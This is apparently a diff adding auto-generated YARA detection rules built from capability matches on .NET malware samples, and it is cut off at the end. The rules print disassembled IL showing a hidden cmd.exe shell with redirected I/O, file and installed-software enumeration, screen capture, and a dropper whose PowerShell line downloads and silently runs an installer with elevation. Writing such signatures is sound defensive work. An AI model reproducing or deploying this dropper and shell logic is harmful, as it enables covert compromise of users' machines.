?? ?? ?? ?? 2D ?? 02 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 2A } + /* +function Reqss.Reqss::b__13 0x06000035@1c444ebeba24dcba8628b7dfe5fec7c6 with 1 features: + - delete directory + 0B0B 02 ldarg.0 + 0B0C 7b 9e 00 00 04 ldfld _temp_dir1 + 0B11 17 ldc.i4.1 + 0B12 28 53 00 00 0a call System.IO.Directory::Delete + 0B17 2a ret + */ + $c14 = { 02 7B ?? ?? ?? ?? 17 28 ?? ?? ?? ?? 2A } + /* +function Reqss.Reqss::b__e 0x06000030@1c444ebeba24dcba8628b7dfe5fec7c6 with 1 features: + - delete file + 0A5F 02 ldarg.0 + 0A60 7b 9e 00 00 04 ldfld _temp_dir1 + 0A65 28 51 00 00 0a call System.IO.File::Delete + 0A6A 2a ret + */ + $c15 = { 02 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 2A } + /* +function Reqss.Reqss::b__8 0x0600002a@1c444ebeba24dcba8628b7dfe5fec7c6 with 1 features: + - enumerate files on Windows + 0900 02 ldarg.0 + 0901 7b a0 00 00 04 ldfld dir1 + 0906 6f 4b 00 00 0a callvirt System.IO.DirectoryInfo::GetDirectories + 090B 0b stloc.1 + 090C 16 ldc.i4.0 + 090D 0c stloc.2 + 090E 2b 24 br.s 0x934 + 0910 07 ldloc.1 + 0911 08 ldloc.2 + 0912 9a ldelem.ref + 0913 0a stloc.0 + 0914 02 ldarg.0 + 0915 25 dup + 0916 7b a1 00 00 04 ldfld _res2 + 091B 06 ldloc.0 + 091C 6f 4c 00 00 0a callvirt System.IO.FileSystemInfo::get_Name + 0921 72 39 00 00 70 ldstr ":d:0|" + 0926 28 4d 00 00 0a call System.String::Concat + 092B 7d a1 00 00 04 stfld _res2 + 0930 08 ldloc.2 + 0931 17 ldc.i4.1 + 0932 58 add + 0933 0c stloc.2 + 0934 08 ldloc.2 + 0935 07 ldloc.1 + 0936 8e ldlen + 0937 69 conv.i4 + 0938 32 d6 blt.s 0x910 + 093A 2a ret + */ + $c16 = { 02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 0B 16 0C 2B ?? 07 08 9A 0A 02 25 7B ?? ?? ?? ?? 06 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 7D ?? ?? ?? ?? 08 17 58 0C 08 07 8E 69 32 ?? 2A } + /* +function Reqss.Reqss::b__9 0x0600002b@1c444ebeba24dcba8628b7dfe5fec7c6 with 2 features: + - enumerate files on Windows + - get file size + 0948 02 ldarg.0 + 0949 7b a0 00 00 04 ldfld dir1 + 094E 6f 4e 00 00 0a callvirt System.IO.DirectoryInfo::GetFiles + 0953 0b stloc.1 + 0954 16 ldc.i4.0 + 0955 0c stloc.2 + 0956 2b 54 br.s 0x9ac + 0958 07 ldloc.1 + 0959 08 ldloc.2 + 095A 9a ldelem.ref + 095B 0a stloc.0 + 095C 02 ldarg.0 + 095D 25 dup + 095E 7b a1 00 00 04 ldfld _res2 + 0963 0d stloc.3 + 0964 1b ldc.i4.5 + 0965 8d 01 00 00 01 newarr System.Object + 096A 13 04 stloc.s local(0x0004) + 096C 11 04 ldloc.s local(0x0004) + 096E 16 ldc.i4.0 + 096F 09 ldloc.3 + 0970 a2 stelem.ref + 0971 11 04 ldloc.s local(0x0004) + 0973 17 ldc.i4.1 + 0974 06 ldloc.0 + 0975 6f 4c 00 00 0a callvirt System.IO.FileSystemInfo::get_Name + 097A a2 stelem.ref + 097B 11 04 ldloc.s local(0x0004) + 097D 18 ldc.i4.2 + 097E 72 45 00 00 70 ldstr ":f:" + 0983 a2 stelem.ref + 0984 11 04 ldloc.s local(0x0004) + 0986 19 ldc.i4.3 + 0987 06 ldloc.0 + 0988 6f 4f 00 00 0a callvirt System.IO.FileInfo::get_Length + 098D 8c 31 00 00 01 box System.Int64 + 0992 a2 stelem.ref + 0993 11 04 ldloc.s local(0x0004) + 0995 1a ldc.i4.4 + 0996 72 23 00 00 70 ldstr "|" + 099B a2 stelem.ref + 099C 11 04 ldloc.s local(0x0004) + 099E 28 49 00 00 0a call System.String::Concat + 09A3 7d a1 00 00 04 stfld _res2 + 09A8 08 ldloc.2 + 09A9 17 ldc.i4.1 + 09AA 58 add + 09AB 0c stloc.2 + 09AC 08 ldloc.2 + 09AD 07 ldloc.1 + 09AE 8e ldlen + 09AF 69 conv.i4 + 09B0 32 a6 blt.s 0x958 + 09B2 2a ret + */ + $c17 = { 02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 0B 16 0C 2B ?? 07 08 9A 0A 02 25 7B ?? ?? ?? ?? 0D 1B 8D ?? ?? ?? ?? 13 ?? 11 ?? 16 09 A2 11 ?? 17 06 6F ?? ?? ?? ?? A2 11 ?? 18 72 ?? ?? ?? ?? A2 11 ?? 19 06 6F ?? ?? ?? ?? 8C ?? ?? ?? ?? A2 11 ?? 1A 72 ?? ?? ?? ?? A2 11 ?? 28 ?? ?? ?? ?? 7D ?? ?? ?? ?? 08 17 58 0C 08 07 8E 69 32 ?? 2A } + /* +function Shll.ShellEx::ctor 0x06000081@1c444ebeba24dcba8628b7dfe5fec7c6 with 1 features: + - create a process with modified I/O handles and window + 21F0 14 ldnull + 21F1 0a stloc.0 + 21F2 14 ldnull + 21F3 0b stloc.1 + 21F4 14 ldnull + 21F5 0c stloc.2 + 21F6 02 ldarg.0 + 21F7 72 01 00 00 70 ldstr "" + 21FC 7d 83 00 00 04 stfld _lastLineOut + 2201 02 ldarg.0 + 2202 72 01 00 00 70 ldstr "" + 2207 7d 87 00 00 04 stfld _adm_token + 220C 02 ldarg.0 + 220D 28 0f 00 00 0a call System.Object::.ctor + 2212 02 ldarg.0 + 2213 17 ldc.i4.1 + 2214 7d 81 00 00 04 stfld __isRunning + 2219 02 ldarg.0 + 221A 73 58 00 00 0a newobj System.Diagnostics.Process::.ctor + 221F 7d 7d 00 00 04 stfld __ps + 2224 02 ldarg.0 + 2225 73 55 00 00 0a newobj System.Diagnostics.ProcessStartInfo::.ctor + 222A 7d 7e 00 00 04 stfld __psi + 222F 02 ldarg.0 + 2230 7b 7e 00 00 04 ldfld __psi + 2235 72 45 01 00 70 ldstr "C:\Windows\System32\cmd.exe" + 223A 6f 56 00 00 0a callvirt System.Diagnostics.ProcessStartInfo::set_FileName + 223F 02 ldarg.0 + 2240 7b 7e 00 00 04 ldfld __psi + 2245 17 ldc.i4.1 + 2246 6f 6d 00 00 0a callvirt System.Diagnostics.ProcessStartInfo::set_RedirectStandardInput + 224B 02 ldarg.0 + 224C 7b 7e 00 00 04 ldfld __psi + 2251 17 ldc.i4.1 + 2252 6f 6e 00 00 0a callvirt System.Diagnostics.ProcessStartInfo::set_RedirectStandardOutput + 2257 02 ldarg.0 + 2258 7b 7e 00 00 04 ldfld __psi + 225D 17 ldc.i4.1 + 225E 6f 6f 00 00 0a callvirt System.Diagnostics.ProcessStartInfo::set_RedirectStandardError + 2263 02 ldarg.0 + 2264 7b 7e 00 00 04 ldfld __psi + 2269 16 ldc.i4.0 + 226A 6f 70 00 00 0a callvirt System.Diagnostics.ProcessStartInfo::set_UseShellExecute + 226F 02 ldarg.0 + 2270 7b 7e 00 00 04 ldfld __psi + 2275 17 ldc.i4.1 + 2276 6f 71 00 00 0a callvirt System.Diagnostics.ProcessStartInfo::set_CreateNoWindow + 227B 02 ldarg.0 + 227C 7b 7e 00 00 04 ldfld __psi + 2281 72 4d 00 00 70 ldstr "C:\" + 2286 6f 57 00 00 0a callvirt System.Diagnostics.ProcessStartInfo::set_WorkingDirectory + 228B 02 ldarg.0 + 228C 7b 7d 00 00 04 ldfld __ps + 2291 02 ldarg.0 + 2292 7b 7e 00 00 04 ldfld __psi + 2297 6f 59 00 00 0a callvirt System.Diagnostics.Process::set_StartInfo + 229C 02 ldarg.0 + 229D 7b 7d 00 00 04 ldfld __ps + 22A2 6f 5a 00 00 0a callvirt System.Diagnostics.Process::Start + 22A7 26 pop + 22A8 02 ldarg.0 + 22A9 06 ldloc.0 + 22AA 2d 0d brtrue.s 0x22b9 + 22AC 02 ldarg.0 + 22AD fe 06 84 00 00 06 ldftn <.ctor>b__0 + 22B3 73 72 00 00 0a newobj System.Threading.ParameterizedThreadStart::.ctor + 22B8 0a stloc.0 + 22B9 06 ldloc.0 + 22BA 73 73 00 00 0a newobj System.Threading.Thread::.ctor + 22BF 7d 7f 00 00 04 stfld __t1 + 22C4 02 ldarg.0 + 22C5 7b 7f 00 00 04 ldfld __t1 + 22CA 02 ldarg.0 + 22CB 7b 7d 00 00 04 ldfld __ps + 22D0 6f 74 00 00 0a callvirt System.Threading.Thread::Start + 22D5 02 ldarg.0 + 22D6 07 ldloc.1 + 22D7 2d 0d brtrue.s 0x22e6 + 22D9 02 ldarg.0 + 22DA fe 06 85 00 00 06 ldftn <.ctor>b__1 + 22E0 73 72 00 00 0a newobj System.Threading.ParameterizedThreadStart::.ctor + 22E5 0b stloc.1 + 22E6 07 ldloc.1 + 22E7 73 73 00 00 0a newobj System.Threading.Thread::.ctor + 22EC 7d 80 00 00 04 stfld __t2 + 22F1 02 ldarg.0 + 22F2 7b 80 00 00 04 ldfld __t2 + 22F7 02 ldarg.0 + 22F8 7b 7d 00 00 04 ldfld __ps + 22FD 6f 74 00 00 0a callvirt System.Threading.Thread::Start + 2302 02 ldarg.0 + 2303 73 75 00 00 0a newobj System.Timers.Timer::.ctor + 2308 7d 84 00 00 04 stfld _timer + 230D 02 ldarg.0 + 230E 7b 84 00 00 04 ldfld _timer + 2313 23 00 00 00 00 00 40 59 40ldc.r8 101.0 + 231C 6f 76 00 00 0a callvirt System.Timers.Timer::set_Interval + 2321 02 ldarg.0 + 2322 7b 84 00 00 04 ldfld _timer + 2327 08 ldloc.2 + 2328 2d 0d brtrue.s 0x2337 + 232A 02 ldarg.0 + 232B fe 06 86 00 00 06 ldftn <.ctor>b__2 + 2331 73 77 00 00 0a newobj System.Timers.ElapsedEventHandler::.ctor + 2336 0c stloc.2 + 2337 08 ldloc.2 + 2338 6f 78 00 00 0a callvirt System.Timers.Timer::add_Elapsed + 233D 02 ldarg.0 + 233E 7b 84 00 00 04 ldfld _timer + 2343 17 ldc.i4.1 + 2344 6f 79 00 00 0a callvirt System.Timers.Timer::set_Enabled + 2349 2a ret + */ + $c18 = { 14 0A 14 0B 14 0C 02 72 ?? ?? ?? ?? 7D ?? ?? ?? ?? 02 72 ?? ?? ?? ?? 7D ?? ?? ?? ?? 02 28 ?? ?? ?? ?? 02 17 7D ?? ?? ?? ?? 02 73 ?? ?? ?? ?? 7D ?? ?? ?? ?? 02 73 ?? ?? ?? ?? 7D ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 17 6F ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 17 6F ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 17 6F ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 16 6F ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 17 6F ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 26 02 06 2D ?? 02 FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 0A 06 73 ?? ?? ?? ?? 7D ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 02 07 2D ?? 02 FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 0B 07 73 ?? ?? ?? ?? 7D ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 02 73 ?? ?? ?? ?? 7D ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 23 ?? ?? ?? ?? ?? ?? ?? ?? 6F ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 08 2D ?? 02 FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 0C 08 6F ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 17 6F ?? ?? ?? ?? 2A } + /* +function Reqss.Reqss::b__42 0x06000062@1c444ebeba24dcba8628b7dfe5fec7c6 with 1 features: + - query or enumerate registry key + 112B 02 ldarg.0 + 112C 7e 5b 00 00 0a ldsfld Microsoft.Win32.Registry::LocalMachine + 1131 72 55 00 00 70 ldstr "SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" + 1136 6f 5c 00 00 0a callvirt Microsoft.Win32.RegistryKey::OpenSubKey + 113B 7d a6 00 00 04 stfld _temp_key_ + 1140 2a ret + */ + $c19 = { 02 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 7D ?? ?? ?? ?? 2A } + /* +function Reqss.Reqss::b__43 0x06000063@1c444ebeba24dcba8628b7dfe5fec7c6 with 2 features: + - query or enumerate registry key + - query or enumerate registry value + 1150 02 ldarg.0 + 1151 7b a6 00 00 04 ldfld _temp_key_ + 1156 6f 5d 00 00 0a callvirt Microsoft.Win32.RegistryKey::GetSubKeyNames + 115B 0c stloc.2 + 115C 16 ldc.i4.0 + 115D 0d stloc.3 + 115E 38 a5 00 00 00 br 0x1208 + 1163 08 ldloc.2 + 1164 09 ldloc.3 + 1165 9a ldelem.ref + 1166 0a stloc.0 + 1167 02 ldarg.0 + 1168 7b a6 00 00 04 ldfld _temp_key_ + 116D 06 ldloc.0 + 116E 6f 5c 00 00 0a callvirt Microsoft.Win32.RegistryKey::OpenSubKey + 1173 0b stloc.1 + 1174 02 ldarg.0 + 1175 25 dup + 1176 7b a1 00 00 04 ldfld _res2 + 117B 13 04 stloc.s local(0x0004) + 117D 1f 09 ldc.i4.s 0x9 + 117F 8d 01 00 00 01 newarr System.Object + 1184 13 05 stloc.s local(0x0005) + 1186 11 05 ldloc.s local(0x0005) + 1188 16 ldc.i4.0 + 1189 11 04 ldloc.s local(0x0004) + 118B a2 stelem.ref + 118C 11 05 ldloc.s local(0x0005) + 118E 17 ldc.i4.1 + 118F 07 ldloc.1 + 1190 72 bd 00 00 70 ldstr "DisplayName" + 1195 6f 5e 00 00 0a callvirt Microsoft.Win32.RegistryKey::GetValue + 119A a2 stelem.ref + 119B 11 05 ldloc.s local(0x0005) + 119D 18 ldc.i4.2 + 119E 72 d5 00 00 70 ldstr "_;;;" + 11A3 a2 stelem.ref + 11A4 11 05 ldloc.s local(0x0005) + 11A6 19 ldc.i4.3 + 11A7 07 ldloc.1 + 11A8 72 df 00 00 70 ldstr "DisplayVersion" + 11AD 6f 5e 00 00 0a callvirt Microsoft.Win32.RegistryKey::GetValue + 11B2 a2 stelem.ref + 11B3 11 05 ldloc.s local(0x0005) + 11B5 1a ldc.i4.4 + 11B6 72 d5 00 00 70 ldstr "_;;;" + 11BB a2 stelem.ref + 11BC 11 05 ldloc.s local(0x0005) + 11BE 1b ldc.i4.5 + 11BF 07 ldloc.1 + 11C0 72 fd 00 00 70 ldstr "InstallDate" + 11C5 6f 5e 00 00 0a callvirt Microsoft.Win32.RegistryKey::GetValue + 11CA a2 stelem.ref + 11CB 11 05 ldloc.s local(0x0005) + 11CD 1c ldc.i4.6 + 11CE 72 d5 00 00 70 ldstr "_;;;" + 11D3 a2 stelem.ref + 11D4 11 05 ldloc.s local(0x0005) + 11D6 1d ldc.i4.7 + 11D7 07 ldloc.1 + 11D8 72 15 01 00 70 ldstr "Publisher" + 11DD 6f 5e 00 00 0a callvirt Microsoft.Win32.RegistryKey::GetValue + 11E2 a2 stelem.ref + 11E3 11 05 ldloc.s local(0x0005) + 11E5 1e ldc.i4.8 + 11E6 72 29 01 00 70 ldstr "_|" + 11EB a2 stelem.ref + 11EC 11 05 ldloc.s local(0x0005) + 11EE 28 49 00 00 0a call System.String::Concat + 11F3 7d a1 00 00 04 stfld _res2 + 11F8 de 0a leave.s 0x1204 + 11FA 07 ldloc.1 + 11FB 2c 06 brfalse.s 0x1203 + 11FD 07 ldloc.1 + 11FE 6f 2f 00 00 0a callvirt System.IDisposable::Dispose + 1203 dc endfinally + 1204 09 ldloc.3 + 1205 17 ldc.i4.1 + 1206 58 add + 1207 0d stloc.3 + 1208 09 ldloc.3 + 1209 08 ldloc.2 + 120A 8e ldlen + 120B 69 conv.i4 + 120C 3f 52 ff ff ff blt 0x1163 + 1211 2a ret + */ + $c20 = { 02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 0C 16 0D 38 ?? ?? ?? ?? 08 09 9A 0A 02 7B ?? ?? ?? ?? 06 6F ?? ?? ?? ?? 0B 02 25 7B ?? ?? ?? ?? 13 ?? 1F ?? 8D ?? ?? ?? ?? 13 ?? 11 ?? 16 11 ?? A2 11 ?? 17 07 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? A2 11 ?? 18 72 ?? ?? ?? ?? A2 11 ?? 19 07 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? A2 11 ?? 1A 72 ?? ?? ?? ?? A2 11 ?? 1B 07 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? A2 11 ?? 1C 72 ?? ?? ?? ?? A2 11 ?? 1D 07 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? A2 11 ?? 1E 72 ?? ?? ?? ?? A2 11 ?? 28 ?? ?? ?? ?? 7D ?? ?? ?? ?? DE ?? 07 2C ?? 07 6F ?? ?? ?? ?? DC 09 17 58 0D 09 08 8E 69 3F ?? ?? ?? ?? 2A } + /* +function Screenss.ScreenCapture::CaptureScreen 0x06000072@1c444ebeba24dcba8628b7dfe5fec7c6 with 1 features: + - unmanaged call + 1F5A 02 ldarg.0 + 1F5B 28 7c 00 00 06 call GetDesktopWindow + 1F60 28 73 00 00 06 call CaptureWindow + 1F65 2a ret + */ + $c21 = { 02 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 2A } + condition: + all of them +} + +rule super_rule_692f7 +{ + meta: + author = "CAPA Matches" + date_created = "2023-08-10" + date_modified = "2023-08-10" + description = "" + md5 = "692f7fd6d198e804d6af98eb9e390d61" + strings: + /* +function RunFixExe.Program::Main 0x06000003@692f7fd6d198e804d6af98eb9e390d61 with 7 features: + - check if directory exists + - check if file exists + - create directory + - manipulate console buffer + - query or enumerate registry key + - read file on Windows + - unmanaged call + 025C 00 nop + 025D 00 nop + 025E 28 02 00 00 06 call GetConsoleWindow + 0263 0a stloc.0 + 0264 06 ldloc.0 + 0265 16 ldc.i4.0 + 0266 28 01 00 00 06 call ShowWindow + 026B 26 pop + 026C 72 01 00 00 70 ldstr "config.txt" + 0271 28 0f 00 00 0a call System.IO.File::ReadAllLines + 0276 0b stloc.1 + 0277 7e 10 00 00 0a ldsfld Microsoft.Win32.Registry::LocalMachine + 027C 72 17 00 00 70 ldstr "SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\chrome.exe" + 0281 17 ldc.i4.1 + 0282 6f 11 00 00 0a callvirt Microsoft.Win32.RegistryKey::OpenSubKey + 0287 0c stloc.2 + 0288 08 ldloc.2 + 0289 14 ldnull + 028A fe 01 ceq + 028C 0d stloc.3 + 028D 09 ldloc.3 + 028E 2c 27 brfalse.s 0x2b7 + 0290 00 nop + 0291 7e 10 00 00 0a ldsfld Microsoft.Win32.Registry::LocalMachine + 0296 72 95 00 00 70 ldstr "SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\App Paths\chrome.exe" + 029B 6f 12 00 00 0a callvirt Microsoft.Win32.RegistryKey::OpenSubKey + 02A0 0c stloc.2 + 02A1 08 ldloc.2 + 02A2 14 ldnull + 02A3 fe 01 ceq + 02A5 13 04 stloc.s local(0x0004) + 02A7 11 04 ldloc.s local(0x0004) + 02A9 2c 0b brfalse.s 0x2b6 + 02AB 00 nop + 02AC 07 ldloc.1 + 02AD 16 ldc.i4.0 + 02AE 9a ldelem.ref + 02AF 28 04 00 00 06 call DeployApplications + 02B4 00 nop + 02B5 00 nop + 02B6 00 nop + 02B7 72 2c 01 00 70 ldstr "C:\Windows\servicing\fix.exe" + 02BC 28 13 00 00 0a call System.IO.File::Exists + 02C1 13 05 stloc.s local(0x0005) + 02C3 11 05 ldloc.s local(0x0005) + 02C5 2c 0f brfalse.s 0x2d6 + 02C7 00 nop + 02C8 72 2c 01 00 70 ldstr "C:\Windows\servicing\fix.exe" + 02CD 28 14 00 00 0a call System.Diagnostics.Process::Start + 02D2 26 pop + 02D3 00 nop + 02D4 2b 38 br.s 0x30e + 02D6 00 nop + 02D7 72 66 01 00 70 ldstr "C:\Windows\servicing" + 02DC 28 15 00 00 0a call System.IO.Directory::Exists + 02E1 16 ldc.i4.0 + 02E2 fe 01 ceq + 02E4 13 07 stloc.s local(0x0007) + 02E6 11 07 ldloc.s local(0x0007) + 02E8 2c 0b brfalse.s 0x2f5 + 02EA 72 66 01 00 70 ldstr "C:\Windows\servicing" + 02EF 28 16 00 00 0a call System.IO.Directory::CreateDirectory + 02F4 26 pop + 02F5 07 ldloc.1 + 02F6 17 ldc.i4.1 + 02F7 9a ldelem.ref + 02F8 13 06 stloc.s local(0x0006) + 02FA 11 06 ldloc.s local(0x0006) + 02FC 28 05 00 00 06 call DownloadApplications + 0301 00 nop + 0302 72 2c 01 00 70 ldstr "C:\Windows\servicing\fix.exe" + 0307 28 14 00 00 0a call System.Diagnostics.Process::Start + 030C 26 pop + 030D 00 nop + 030E 00 nop + 030F de 13 leave.s 0x324 + 0311 13 08 stloc.s local(0x0008) + 0313 00 nop + 0314 11 08 ldloc.s local(0x0008) + 0316 6f 17 00 00 0a callvirt System.Exception::get_Message + 031B 28 18 00 00 0a call System.Console::WriteLine + 0320 00 nop + 0321 00 nop + 0322 de 00 leave.s 0x324 + 0324 2a ret + */ + $c22 = { 00 00 28 ?? ?? ?? ?? 0A 06 16 28 ?? ?? ?? ?? 26 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 17 6F ?? ?? ?? ?? 0C 08 14 FE 01 0D 09 2C ?? 00 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 0C 08 14 FE 01 13 ?? 11 ?? 2C ?? 00 07 16 9A 28 ?? ?? ?? ?? 00 00 00 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 11 ?? 2C ?? 00 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 00 2B ?? 00 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 16 FE 01 13 ?? 11 ?? 2C ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 07 17 9A 13 ?? 11 ?? 28 ?? ?? ?? ?? 00 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 00 00 DE ?? 13 ?? 00 11 ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 00 DE ?? 2A } + /* +function RunFixExe.Program::DeployApplications 0x06000004@692f7fd6d198e804d6af98eb9e390d61 with 2 features: + - manipulate console buffer + - run PowerShell expression + 0344 00 nop + 0345 14 ldnull + 0346 0a stloc.0 + 0347 72 90 01 00 70 ldstr " " + 034C 28 18 00 00 0a call System.Console::WriteLine + 0351 00 nop + 0352 72 94 01 00 70 ldstr "Deploying application..." + 0357 28 18 00 00 0a call System.Console::WriteLine + 035C 00 nop + 035D 00 nop + 035E 28 19 00 00 0a call System.Management.Automation.PowerShell::Create + 0363 25 dup + 0364 0a stloc.0 + 0365 0b stloc.1 + 0366 00 nop + 0367 06 ldloc.0 + 0368 72 c6 01 00 70 ldstr "$Path = $env:TEMP; $Installer = "chrome_installer.exe"; Invoke-WebRequest "" + 036D 02 ldarg.0 + 036E 72 5f 02 00 70 ldstr "" -OutFile $Path\$Installer; Start-Process -FilePath $Path\$Installer -Args "/silent /install" -Verb RunAs -Wait; Remove-Item $Path\$Installer" + 0373 28 1a 00 00 0a call System.String::Concat + 0378 6f 1b 00 00 0a callvirt System.Management.Automation.PowerShell::AddScript + 037D 26 pop + 037E 06 ldloc.0 + 037F 6f 1c 00 00 0a callvirt System.Management.Automation.PowerShell::Invoke + 0384 0c stloc.2 + 0385 00 nop + 0386 08 ldloc.2 + 0387 6f 1d 00 00 0a callvirt GetEnumerator + 038C 0d stloc.3 + 038D 2b 4a br.s 0x3d9 + 038F 09 ldloc.3 + 0390 6f 1e 00 00 0a callvirt get_Current + 0395 13 04 stloc.s local(0x0004) + 0397 00 nop + 0398 11 04 ldloc.s local(0x0004) + 039A 14 ldnull + 039B fe 03 cgt.un + 039D 13 05 stloc.s local(0x0005) + 039F 11 05 ldloc.s local(0x0005) + 03A1 2c 35 brfalse.s 0x3d8 + 03A3 00 nop + 03A4 11 04 ldloc.s local(0x0004) + 03A6 6f 1f 00 00 0a callvirt System.Management.Automation.PSObject::get_BaseObject + 03AB 6f 20 00 00 0a callvirt System.Object::GetType + 03B0 6f 21 00 00 0a callvirt System.Type::get_FullName + 03B5 28 18 00 00 0a call System.Console::WriteLine + 03BA 00 nop + 03BB 11 04 ldloc.s local(0x0004) + 03BD 6f 1f 00 00 0a callvirt System.Management.Automation.PSObject::get_BaseObject + 03C2 6f 22 00 00 0a callvirt System.Object::ToString + 03C7 72 7e 03 00 70 ldstr " + " + 03CC 28 23 00 00 0a call System.String::Concat + 03D1 28 18 00 00 0a call System.Console::WriteLine + 03D6 00 nop + 03D7 00 nop + 03D8 00 nop + 03D9 09 ldloc.3 + 03DA 6f 24 00 00 0a callvirt System.Collections.IEnumerator::MoveNext + 03DF 2d ae brtrue.s 0x38f + 03E1 de 0b leave.s 0x3ee + 03E3 09 ldloc.3 + 03E4 2c 07 brfalse.s 0x3ed + 03E6 09 ldloc.3 + 03E7 6f 25 00 00 0a callvirt System.IDisposable::Dispose + 03EC 00 nop + 03ED dc endfinally + 03EE 06 ldloc.0 + 03EF 6f 26 00 00 0a callvirt System.Management.Automation.PowerShell::get_Streams + 03F4 6f 27 00 00 0a callvirt System.Management.Automation.PSDataStreams::get_Error + 03F9 6f 28 00 00 0a callvirt get_Count + 03FE 16 ldc.i4.0 + 03FF fe 02 cgt + 0401 13 06 stloc.s local(0x0006) + 0403 11 06 ldloc.s local(0x0006) + 0405 2c 28 brfalse.s 0x42f + 0407 00 nop + 0408 06 ldloc.0 + 0409 6f 26 00 00 0a callvirt System.Management.Automation.PowerShell::get_Streams + 040E 6f 27 00 00 0a callvirt System.Management.Automation.PSDataStreams::get_Error + 0413 28 01 00 00 2b call [CLR_METADATA_TABLE_GENERICMETHOD] + 0x28C0 0x0 Method_CodedIndex: 0x53 + 0x28C2 0x2 Instantiation_BlobIndex: 0xEA + 0418 6f 22 00 00 0a callvirt System.Object::ToString + 041D 13 07 stloc.s local(0x0007) + 041F 72 82 03 00 70 ldstr "Error: {0}" + 0424 11 07 ldloc.s local(0x0007) + 0426 28 2a 00 00 0a call System.Console::WriteLine + 042B 00 nop + 042C 00 nop + 042D 2b 0b br.s 0x43a + 042F 72 98 03 00 70 ldstr "Installation has completed successfully." + 0434 28 18 00 00 0a call System.Console::WriteLine + 0439 00 nop + 043A 00 nop + 043B de 0b leave.s 0x448 + 043D 07 ldloc.1 + 043E 2c 07 brfalse.s 0x447 + 0440 07 ldloc.1 + 0441 6f 25 00 00 0a callvirt System.IDisposable::Dispose + 0446 00 nop + 0447 dc endfinally + 0448 00 nop + 0449 de 18 leave.s 0x463 + 044B 13 08 stloc.s local(0x0008) + 044D 00 nop + 044E 72 ea 03 00 70 ldstr "Error occured: {0}" + 0453 11 08 ldloc.s local(0x0008) + 0455 6f 2b 00 00 0a callvirt System.Exception::get_InnerException + 045A 28 2a 00 00 0a call System.Console::WriteLine + 045F 00 nop + 0460 00 nop + 0461 de 00 leave.s 0x463 + 0463 de 14 leave.s 0x479 + 0465 00 nop + 0466 06 ldloc.0 + 0467 14 ldnull + 0468 fe 03 cgt.un + 046A 13 09 stloc.s local(0x0009) + 046C 11 09 ldloc.s local(0x0009) + 046E 2c 07 brfalse.s 0x477 + 0470 06 ldloc.0 + 0471 6f 2c 00 00 0a callvirt System.Management.Automation.PowerShell::Dispose + 0476 00 nop + 0477 00 nop + 0478 dc endfinally + 0479 2a ret + */ + $c23 = { 00 14 0A 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 00 28 ?? ?? ?? ?? 25 0A 0B 00 06 72 ?? ?? ?? ?? 02 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 26 06 6F ?? ?? ?? ?? 0C 00 08 6F ?? ?? ?? ?? 0D 2B ?? 09 6F ?? ?? ?? ?? 13 ?? 00 11 ?? 14 FE 03 13 ?? 11 ?? 2C ?? 00 11 ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 11 ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 00 00 09 6F ?? ?? ?? ?? 2D ?? DE ?? 09 2C ?? 09 6F ?? ?? ?? ?? 00 DC 06 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 16 FE 02 13 ?? 11 ?? 2C ?? 00 06 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 72 ?? ?? ?? ?? 11 ?? 28 ?? ?? ?? ?? 00 00 2B ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 00 